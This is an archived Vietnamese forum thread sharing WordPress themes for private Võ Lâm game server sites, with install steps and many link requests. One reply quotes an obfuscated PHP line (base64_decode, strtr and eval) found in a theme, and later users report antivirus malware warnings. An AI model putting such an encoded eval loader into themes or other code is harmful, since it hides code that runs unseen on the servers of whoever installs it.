PDA

View Full Version : [JX] Share Home Themes Võ Lâm 1 Wordpress Viết Tin Tức

amocthong1
15-01-15, 09:35 AM
Vì sự mong mỗi của anh em hôm này xin được phép share lại themes Wordpress Võ Lâm 1 2016 Update Mới

Sau đây là hướng dẫn Cài

1: Cài Wordpress

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

2: Cài Themes

Giải nén file VoLam1.rar ta được 1 thư mục sau đó copy vào wp-content/themes/

3: Active Themes

Truy cập tên miền/wp-admin/ Login Admin

Tìm Dòng Appearance - sau đó active themes Võ Lâm 1

4: Hướng Dẫn Post Bài

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

5: Config Link Download

Vào thư mục themes có file config.php
chỉnh sửa link download tại đó

6: Tạo Page Tỉnh

Vào Admin Tìm dòng Pages Tạo Trang tải game và copy link edit vài file confing.php

Update Link
Google
Links Download 1 : Võ Lâm 1 Update (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>)
Mega.co.nz
Links Download 2 : Võ Lâm 1 Update (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>!90M2WTCJ!iv2J3INTitHSrcIO27ESZFjxs9xrOpLVc_OypWr POEc)
Khuyên Dùng Host Hoặc Xampp 1.7.1

Tài Sản

phongmous96
16-01-15, 11:26 AM
Cái này chại như thế lào appsrv vào ngay error link 1 ngay :(

amocthong1
16-01-15, 11:38 AM
bạn chạy với xampp 1.7.1 good nhá
hoặc 1.8.3 cũng đc nhưng 1.8.3 thì áp dụng cho themes nào k có code về BXH vì minh code BXH trên 1.8.3 k chạy mà 1.7.1 chạy tốt
nên khuyên bạn chạy 1.7.1 nhá

ngogiahuy
22-01-15, 06:20 PM
Bạn cho hỏi cái này xài kiểu gì ý nhỉ

mình dowload cái theme về chạy vs xampp 1.7.1 bỏ vào httdocs thì báo lỗi index.php line 1 có cần dowload gì nữa ko bạn

hoangcungclub
15-07-15, 08:37 PM
Tham gia clbgames.vn gần 1 năm học hỏi được nhiều thứ mình thì bên box MU chứ JX hay KT TLBB gì cũng k rành mà giờ cũng chán Server nên rảnh làm web tặng anh/em clb sử dụng có gì sai a/e bỏ qua em xây nhà rồi k cần gạch đâu ạ ;)

Vào vấn đề luôn demo: Hình cái đả

Demo
Link web demo:
ID: poster
Pass: 123456

ai còn dữ code nầy share link qua giúp mình nhe. thanks cả nhà.

bualolu
18-07-15, 11:31 AM

đang cần up phụ.......................................[-O<[-O<

hoangcungclub
18-07-15, 09:05 PM

Linh_JX
07-10-15, 12:26 AM

amocthong1
07-10-15, 05:44 AM
mình chỉ còn VL 2

Võ Lâm 1 là hàng đầu tay nên k tốt bằng ;))

bualolu
15-10-15, 03:16 PM
mình chỉ còn VL 2

Võ Lâm 1 là hàng đầu tay nên k tốt bằng ;))

ok thanks ông bạn.................

volamkysu.vn
15-10-15, 03:32 PM
tự code theeme đc thì đem bán ngon rầu :D ai test rồi cho coi cái demo cái nào

amocthong1
15-10-15, 04:35 PM
tự code theeme đc thì đem bán ngon rầu :D ai test rồi cho coi cái demo cái nào

Không dám vẫn còn kém xa :))

Themes Võ Lâm 2

Vì Themes 1 này là hàng đầu tay còn nhiều sai sót nên themes 2 này sử dụng tốt hơn các bạn thử nhá :-h

Tài sản

--- Chế độ gộp bài viết ---

vừa xong cái này nhưng k biết ai dùng k :))

bualolu
15-10-15, 05:57 PM
- Ông share tui cái theme Cửu Âm được không tui về design lại game khác nhìn cấu trúc sắp xếp đẹp mắt qá

amocthong1
15-10-15, 06:33 PM
đương nhiên đc nhưng phải bị mã hóa 1 số thứ :)

assmin
15-10-15, 07:19 PM
đương nhiên đc nhưng phải bị mã hóa 1 số thứ :)

cứ share là tks có shell là ban ;))

amocthong1
15-10-15, 07:46 PM
zậy thì khỏi vậy
vì mình mã hóa bằng web onl nếu có chắc zo web mà nếu vậy thì thui

volamkysu.vn
15-10-15, 09:18 PM
share bộ themes sau đi b :D nhìn đẹp thế, ko share thì b lên cái demo ngắm tí nào :D
ko biết b làm đc skin xenforo ko??

bualolu
15-10-15, 09:56 PM
zậy thì khỏi vậy
vì mình mã hóa bằng web onl nếu có chắc zo web mà nếu vậy thì thui

- Bác share skin Cửu Âm được không thế

amocthong1
16-10-15, 10:30 AM
share bộ themes sau đi b :D nhìn đẹp thế, ko share thì b lên cái demo ngắm tí nào :D
ko biết b làm đc skin xenforo ko??

xenforo đang vọc vành chưa cứng lắm :)
nói về giao diện thì mình làm hết luôn cả trang quản lý tài khoản nhưng times ích nên hạn chế nhiều

mình sẽ làm demo các themes cho các bạn coi :-*

amocthong1
16-10-15, 01:43 PM
Demo

Mỗi ngày sẽ đổi 1 Themes và sẽ cấp User để Post bài thử nghiệm :D

bualolu
17-10-15, 11:21 AM
Demo

Mỗi ngày sẽ đổi 1 Themes và sẽ cấp User để Post bài thử nghiệm :D

- Bác hóng share theme cửu âm sao không thấy bác !!

avinhdt
04-11-15, 10:54 PM
xin lại themes Mu đi thớt ơi...............

amocthong1
04-11-15, 11:01 PM
thấy ích ai hưởng ứng nên k up lại để update lại:-"

bboynam99
05-11-15, 01:17 PM
Bác update link 3 thêm MU,TLBB,TDK đi bác
Bữa trước down mà giờ lạc mất luôn òi

volamkysu.vn
07-11-15, 11:26 PM

nhận làm skin xf ko b ơi, bữa ib b mà ko thấy tl z :-SS

volamkysu.vn
17-11-15, 04:06 AM
à dịch đc rồi, xin phép thớt đổi cái copyright nhá :))

còn khúc này để làm gì nhỉ

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie' ,'aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;); ?>

minhkhanh109
16-03-16, 03:45 AM
ai còn giữ theme võ lâm 1 cho mình xin lại link với, cảm ơn!

minhkhanh109
02-04-16, 04:59 PM
Parse error: syntax error, unexpected $end in E:\wp-content\themes\volam\single.php on line 141
ai giúp mình lỗi này với

minhkhanh109
02-04-16, 06:42 PM
ai biết giúp mình với, cảm ơn các bạn.
30charrrrrrrrrrrrrrrrrrrrrrrrrrrrr

amocthong1
24-04-16, 10:04 PM
Update Themes 2016

Nếu Dùng để copyright tên mình thì mình cảm ơn nhá còn edit thì tùy các bạn ;)

minhkhanh109
24-04-16, 11:15 PM
Chúng tôi rất tiếc. Bạn không thể truy cập vào mục này vì mục này vi phạm Điều khoản dịch vụ (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>) của chúng tôi.
Tìm hiểu thêm về chủ đề này tại Trung tâm trợ giúp của Google Drive (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>).
KHÔNG DOWNLOAD ĐƯỢC

amocthong1
25-04-16, 06:21 AM
Đã fix lại Link Cập Nhật Thêm Link

trungpro2398
25-04-16, 11:36 AM
Cảm ơn bác nhiều lắm ^_^

Hãy viết tên miền đầy đủ của clbgamesvn ? (gợi ý câu trả lời: <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>)

MozillaFirefox
11-05-16, 09:41 AM
Sao lại phát hiện mã độc 1 đống thế này hả bác :(

hocdevgame
11-05-16, 08:58 PM
Làm sao để add 1 php đăng ký của võ lâm linux vào đc vậy mọi người help....!

amocthong1
11-05-16, 10:32 PM
Sao lại phát hiện mã độc 1 đống thế này hả bác :(

chỉ là mã hóa thật sự nó chạy độc lập ko dính tới data cua game nó chỉ viết tin tức thui nên chả lo gì nếu bạn nào am hiểu wordpress 1 tý nó có data riêng mà:))

Làm sao để add 1 php đăng ký của võ lâm linux vào đc vậy mọi người help....!

bạn chỉ dùng link để trỏ về trang đăng ký thui chứ chưa reg thẳng đc ;))

hocdevgame
11-05-16, 10:45 PM
A có thể cho em xin yahoo để pm hỏi chuyện đăng ký với ạ :(

amocthong1
26-05-16, 08:27 PM
A có thể cho em xin yahoo để pm hỏi chuyện đăng ký với ạ :(

nguyenducthongcfo

trantuan22
14-06-16, 12:54 PM
cho m xin link may cai trang chu do vs dc khong ban

makute7413
15-06-16, 04:29 PM
Bác cho mình xin theme TLBB được không :D

anhphi97
24-08-16, 12:05 AM
cho lại link mf hay khác đi bác ơi link báo virus ko cho tải :(

slipkorn13
25-08-16, 07:29 PM
someone can upload Mu Online Wordpress Theme please ?!!! I like them... thanks!!

matdecha
14-09-20, 02:08 PM
Bác nào còn lưu reupload giúp mình với :(

phjthjenngoa
17-09-20, 09:42 AM
Không dám vẫn còn kém xa :))

Themes Võ Lâm 2

Vì Themes 1 này là hàng đầu tay còn nhiều sai sót nên themes 2 này sử dụng tốt hơn các bạn thử nhá :-h

Tài sản

vừa xong cái này nhưng k biết ai dùng k :))

Có bác nào còn giữ những theme này hem sale hoặc share e với!